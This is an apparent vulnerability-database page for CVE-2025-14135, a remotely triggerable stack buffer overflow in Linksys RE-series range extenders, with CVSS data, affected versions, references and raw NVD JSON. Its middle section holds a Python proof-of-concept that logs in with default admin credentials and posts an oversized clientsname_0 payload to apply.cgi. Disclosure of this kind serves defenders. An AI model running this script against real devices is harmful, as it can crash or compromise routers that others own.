CVE-2025-14135

Description

A vulnerability was identified in Linksys RE6500, RE6250, RE6300, RE6350, RE7000 and RE9000 1.0.013.001/1.0.04.001/1.0.04.002/1.1.05.003/1.2.07.001. This affects the function AP_get_wired_clientlist_setClientsName of the file mod_form.so. The manipulation of the argument clientsname_0 leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linksys:re6500_firmware:1.0.013.001:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:linksys:re6500:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:linksys:re6250_firmware:1.0.04.001:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:linksys:re6250:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:linksys:re6300_firmware:1.2.07.001:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:linksys:re6300:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:linksys:re6350_firmware:1.0.04.001:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:linksys:re6350:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:linksys:re7000_firmware:1.1.05.003:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:linksys:re7000:-:*:*:*:*:*:*:* - NOT VULNERABLE

Linksys RE6500 < 1.0.013.001

Linksys RE6250 < 1.0.04.001

Linksys RE6300 < 1.0.04.002

Linksys RE6350 < 1.1.05.003

Linksys RE7000 < 1.2.07.001

Linksys RE9000 < 1.0.013.001

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# CVE-2025-14135 PoC - Linksys RE6500 Stack Buffer Overflow
# Target: AP_get_wired_clientlist_setClientsName in mod_form.so

import requests
import sys
import argparse

def create_payload(payload_size=1024):
    """Generate overflow payload"""
    # Pattern to overwrite return address and control flow
    payload = 'A' * payload_size
    # Add NOP sled and shellcode placeholder
    payload += '\\x90' * 16
    payload += '\\xcc' * 16  # INT3 for debugging
    return payload

def exploit(target_ip, target_port=80, username='admin', password='admin'):
    """Send exploit payload to vulnerable endpoint"""
    login_url = f"http://{target_ip}:{target_port}/login.cgi"
    exploit_url = f"http://{target_ip}:{target_port}/apply.cgi"
    
    # Login first
    login_data = {
        'username': username,
        'password': password
    }
    
    session = requests.Session()
    try:
        session.post(login_url, data=login_data, timeout=10)
    except:
        pass
    
    # Send malicious payload
    exploit_data = {
        'clientsname_0': create_payload(2000),
        'submit_button': 'ap_get_wired_clientlist',
        'change_action': 'apply'
    }
    
    try:
        response = session.post(exploit_url, data=exploit_data, timeout=10)
        print(f"[+] Payload sent to {target_ip}:{target_port}")
        print(f"[+] Response status: {response.status_code}")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='CVE-2025-14135 PoC')
    parser.add_argument('target', help='Target IP address')
    parser.add_argument('-p', '--port', default=80, type=int, help='Target port')
    parser.add_argument('-u', '--username', default='admin', help='Username')
    parser.add_argument('-P', '--password', default='admin', help='Password')
    args = parser.parse_args()
    
    exploit(args.target, args.port, args.username, args.password)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14135
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14135
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14135/
[4] VulDB https://vuldb.com/cve/CVE-2025-14135
[5] https://github.com/wudipjq/my_vuln/blob/main/Linksys2/vuln_64/64.md
[6] https://github.com/wudipjq/my_vuln/blob/main/Linksys2/vuln_64/64.md#poc
[7] https://vuldb.com/?ctiid.334524
[8] https://vuldb.com/?id.334524
[9] https://vuldb.com/?submit.697982
[10] https://www.linksys.com/
[11] https://github.com/wudipjq/my_vuln/blob/main/Linksys2/vuln_64/64.md
[12] https://github.com/wudipjq/my_vuln/blob/main/Linksys2/vuln_64/64.md#poc

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14135", "sourceIdentifier": "[email protected]", "published": "2025-12-06T12:15:46.527", "lastModified": "2025-12-10T18:00:17.737", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was identified in Linksys RE6500, RE6250, RE6300, RE6350, RE7000 and RE9000 1.0.013.001/1.0.04.001/1.0.04.002/1.1.05.003/1.2.07.001. This affects the function AP_get_wired_clientlist_setClientsName of the file mod_form.so. The manipulation of the argument clientsname_0 leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-121"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linksys:re6500_firmware:1.0.013.001:*:*:*:*:*:*:*", "matchCriteriaId": "92354C9C-D1B2-4143-803D-DE5EF7842184"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:linksys:re6500:-:*:*:*:*:*:*:*", "matchCriteriaId": "52622B22-2E42-443B-81DA-7C42ECCF0564"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linksys:re6250_firmware:1.0.04.001:*:*:*:*:*:*:*", "matchCriteriaId": "70728D67-153A-49FA-80E2-0DE9086DA253"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:linksys:re6250:-:*:*:*:*:*:*:*", "matchCriteriaId": "898FD49F-4225-47FF-822C-9E4FFB5EE192"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linksys:re6300_firmware:1.2.07.001:*:*:*:*:*:*:*", "matchCriteriaId": "1E3A6A93-D598-4F52-808C-EAA45B468066"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:linksys:re6300:-:*:*:*:*:*:*:*", "matchCriteriaId": "25647318-6422-418C-99B8-C806FF490028"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "crite ... (truncated)